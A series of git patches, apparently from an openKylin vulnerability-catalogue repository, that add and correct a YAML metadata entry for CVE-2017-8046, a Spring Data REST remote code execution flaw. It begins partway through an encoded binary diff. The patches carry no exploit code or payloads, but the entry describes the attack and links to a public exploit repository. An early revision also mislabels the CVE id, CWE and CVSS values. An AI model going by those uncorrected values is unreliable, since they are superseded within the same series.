zlKL+yJ)Y5JBN6g%K9ivi3{J<e)C86Hdj>y{$pR>3(U%gaAV{G4wiPbE81m(ew^q*6
zA9Gv8HeTtl(Umr<vXz?)4N5{pN(P#sTAczzs?NJs7%iU&ia2oBm|WJ!^T*~W0Meva
zSOD5%TWC7T*TUYLTt}(wpWUAqu{l2>LXDB^_D+h90W0!GEsj4}oPGc*NCW<io&NjK
z@gMnPg#U;k|F<H@e;5AOA>?0*KSQrShvd)4e=YnkBFTSV`yYtE25EnZ|A9FAdHSyr
z|0-7dSH@q{o_{h*f2I!pYsNokKmSVjYl7iV0xRtA5dNBH_*4I%ea~Me>L24*g^>_{
zNB=LD>ffvU&*HyK)j!4ce_Q;o7VEz!{4!bpB-H=+2!FL)|2^iH>G~%I0_k^W=}%|(
zFBa^-NBuHk|3n%84^e-yWdA+xmnr)vuJ3<=`xh4NzsLSEY5&AhBLB}O^w(Yf9s9?^
z`~NN5ztjJ<Y5R-*$5%tz{~cZVH!NHQX;83VaM+)RJ?PIHrvU(<0AOWdF=AwAXEioq
iGG%5o{KU*^Vrat5$jJ8d4HI?-c0*<cPGdt3=KlxO?rgUJ

-- 
Gitee


From f44ac1afd579648554ee8c6bf6b937d39176119e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Mon, 10 Apr 2023 10:57:34 +0000
Subject: [PATCH 06/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?=
 =?UTF-8?q?e/java-spring/2017/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/java-spring/2017/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/java-spring/2017/.keep

diff --git a/cve/java-spring/2017/.keep b/cve/java-spring/2017/.keep
deleted file mode 100644
index e69de29b..00000000
-- 
Gitee


From 2df5fa1faf33a7e2d45cb3318f7c6b33731e01ea Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Mon, 10 Apr 2023 10:58:50 +0000
Subject: [PATCH 07/13] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20ya?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/java-spring/2017/ya/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/java-spring/2017/ya/.keep

diff --git a/cve/java-spring/2017/ya/.keep b/cve/java-spring/2017/ya/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee


From 312ad7470cf0e0155458825ab8b5d6cee485f216 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Mon, 10 Apr 2023 11:03:55 +0000
Subject: [PATCH 08/13] add cve-2017-8046
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 王烁林 <17377137@buaa.edu.cn>
---
 cve/java-spring/2017/ya/.keep              |  0
 cve/java-spring/2017/ya/CVE-2017-8046.yaml | 21 +++++++++++++++++++++
 2 files changed, 21 insertions(+)
 delete mode 100644 cve/java-spring/2017/ya/.keep
 create mode 100644 cve/java-spring/2017/ya/CVE-2017-8046.yaml

diff --git a/cve/java-spring/2017/ya/.keep b/cve/java-spring/2017/ya/.keep
deleted file mode 100644
index e69de29b..00000000
diff --git a/cve/java-spring/2017/ya/CVE-2017-8046.yaml b/cve/java-spring/2017/ya/CVE-2017-8046.yaml
new file mode 100644
index 00000000..0d9f4311
--- /dev/null
+++ b/cve/java-spring/2017/ya/CVE-2017-8046.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-5398
+source: 
+  https://github.com/m3ssap0/spring-break_cve-2017-8046
+info:
+  name: Spring框架是 Java 平台的一个开源的全栈（full-stack）应用程序框架和控制反转容器实现，一般被直接称为 Spring。
+  severity: high
+  description: |
+    在2.5.12、2.6.7、3.0 RC3之前的Pivotal spring data rest版本、2.0.0M4之前的spring Boot版本以及Kay-RC3之前的spring data发布序列中，提交给spring data rest服务器的恶意PATCH请求可以使用特制的JSON数据来运行任意Java代码。
+  scope-of-influence:
+    Pivotal spring data rest 2.5.x (<2.5.12)
+    spring Boot 2.0.x (<2.0.0)
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2017-8046
+    cwe-id: CWE-494, CWE-79
+    cnvd-id: None
+    kve-id: None
+  tags: cve2017, spring-framework, RFD
\ No newline at end of file
-- 
Gitee


From e713b6dd40e55aa259f149d9824cf058101a18fc Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Mon, 10 Apr 2023 11:04:16 +0000
Subject: [PATCH 09/13] update cve/java-spring/2017/ya/CVE-2017-8046.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 王烁林 <17377137@buaa.edu.cn>
---
 cve/java-spring/2017/ya/CVE-2017-8046.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cve/java-spring/2017/ya/CVE-2017-8046.yaml b/cve/java-spring/2017/ya/CVE-2017-8046.yaml
index 0d9f4311..2bef8c65 100644
--- a/cve/java-spring/2017/ya/CVE-2017-8046.yaml
+++ b/cve/java-spring/2017/ya/CVE-2017-8046.yaml
@@ -1,4 +1,4 @@
-id: CVE-2020-5398
+id: CVE-2017-8046
 source: 
   https://github.com/m3ssap0/spring-break_cve-2017-8046
 info:
-- 
Gitee


From 9586e76953c2d2274358378f3e61c576665e8b3e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Mon, 10 Apr 2023 11:04:30 +0000
Subject: [PATCH 10/13] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/java-sp?=
 =?UTF-8?q?ring/2017/ya=20=E4=B8=BA=20cve/java-spring/2017/yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/java-spring/2017/{ya => yaml}/CVE-2017-8046.yaml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename cve/java-spring/2017/{ya => yaml}/CVE-2017-8046.yaml (100%)

diff --git a/cve/java-spring/2017/ya/CVE-2017-8046.yaml b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml
similarity index 100%
rename from cve/java-spring/2017/ya/CVE-2017-8046.yaml
rename to cve/java-spring/2017/yaml/CVE-2017-8046.yaml
-- 
Gitee


From 4c6c7747ae3cc4f8be99e1f00e83a46fe4dd34f5 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Mon, 10 Apr 2023 11:07:25 +0000
Subject: [PATCH 11/13] update openkylin_list.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 王烁林 <17377137@buaa.edu.cn>
---
 openkylin_list.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 211571f6..ece28b62 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -154,6 +154,7 @@ cve:
   redis:
     - CVE-2022-31144
   java-spring:
+    - CVE-2017-8046
     - CVE-2020-5398
     - CVE-2022-22965
     - CVE-2022-22963
-- 
Gitee


From 41c13fb1dee8d6052ab579e25c645c030b1ede81 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Tue, 11 Apr 2023 09:02:45 +0000
Subject: [PATCH 12/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?=
 =?UTF-8?q?e/java-spring/2017/CVE-2017-8046/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/java-spring/2017/CVE-2017-8046/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/java-spring/2017/CVE-2017-8046/.keep

diff --git a/cve/java-spring/2017/CVE-2017-8046/.keep b/cve/java-spring/2017/CVE-2017-8046/.keep
deleted file mode 100644
index e69de29b..00000000
-- 
Gitee


From 7998f50dcc588686b627464ffc76ec64ea4b1d1c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Tue, 11 Apr 2023 09:12:54 +0000
Subject: [PATCH 13/13] update cve/java-spring/2017/yaml/CVE-2017-8046.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 王烁林 <17377137@buaa.edu.cn>
---
 cve/java-spring/2017/yaml/CVE-2017-8046.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml
index 2bef8c65..c6b5f608 100644
--- a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml
+++ b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml
@@ -12,10 +12,10 @@ info:
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
   classification:
-    cvss-metrics:  CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
-    cvss-score: 7.5
+    cvss-metrics:  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2017-8046
-    cwe-id: CWE-494, CWE-79
+    cwe-id: CWE-20
     cnvd-id: None
     kve-id: None
-  tags: cve2017, spring-framework, RFD
\ No newline at end of file
+  tags: cve2017, spring-framework
\ No newline at end of file
-- 
Gitee